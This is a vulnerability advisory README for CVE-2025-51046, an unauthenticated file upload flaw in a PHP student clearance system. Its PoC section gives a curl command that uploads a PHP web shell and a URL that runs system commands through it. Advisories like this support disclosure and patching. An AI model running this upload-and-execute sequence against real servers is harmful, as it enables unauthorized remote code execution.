疑似Oday
PoC and technical advisory for CVE-2025-51046 – An unauthenticated RCE vulnerability in SourceCodester Online Student Clearance System 1.0 caused by improper file upload validation in edit-photo.php.# CVE-2025-51046 - Remote File Upload Vulnerability in SourceCodeste Online Student Clearance System v1.0
## Overview
**CVE ID**: CVE-2025-51046
**Vendor**: SourceCodeste
**Product**: Online Student Clearance System using PHP and MySQL
**Version**: 1.0
**Component**: `edit-photo.php` file upload functionality (and the `/uploads/` directory)
**Attack Type**: Remote
**Vulnerability Type**: Remote File Upload (leading to Remote Code Execution)
**Discoverer**: Meshari Alluhaybi
---
## Description
SourceCodeste Online Student Clearance System v1.0 has an unrestricted file upload vulnerability in the `edit-photo.php` file. The application fails to validate or restrict uploaded file types, allowing an attacker to upload a PHP script (e.g., a web shell). The script is stored in the publicly accessible `/uploads/` directory, enabling remote attackers to execute arbitrary system commands on the server.
---
## Attack Vectors
An attacker can exploit this vulnerability by uploading a malicious PHP file via the file upload functionality in `edit-photo.php`. Due to lack of proper file type restrictions and sanitization, the malicious file is stored in `/uploads/` where it can be directly accessed and executed.
---
## Proof of Concept (PoC)
### 1. Upload the Web Shell
curl -F "userImage=@shell.php;type=application/x-php" -F "btnedit=" http://192.168.8.138/edit-photo.php
### 2. Execute Remote Commands
Access the uploaded shell:
http://192.168.8.138/uploads/shell.php?cmd=id
This command will execute the `id` command on the server, proving remote code execution.
---
## Affected Product Details
* **Vendor**: SourceCodeste
* **Product**: Online Student Clearance System using PHP and MySQL
* **Version**: 1.0
* **Component**: `edit-photo.php` (file upload functionality) and `/uploads/` directory
---
## Impact
* Full remote code execution on the server
* Potential system compromise and privilege escalation
* Unauthorized manipulation of the web application
---
## Recommendations
* **File Upload Restrictions**: Enforce strict file extension whitelisting (e.g., allow only `.jpg`, `.png`).
* **MIME Type Verification**: Check MIME types on the server side to ensure files match allowed types.
* **Storage Location**: Store uploaded files outside the web root to prevent direct access.
* **File Renaming**: Rename uploaded files and remove original extensions to reduce risk.
---
## References
* [SourceCodester](http://sourcecodester.com)
* [Online Student Clearance System](http://online.com)
---
[4.0K] /data/pocs/9b1f81844406f75741fe7e0ed2f1192c303ed6de
└── [2.6K] README.md
0 directories, 1 file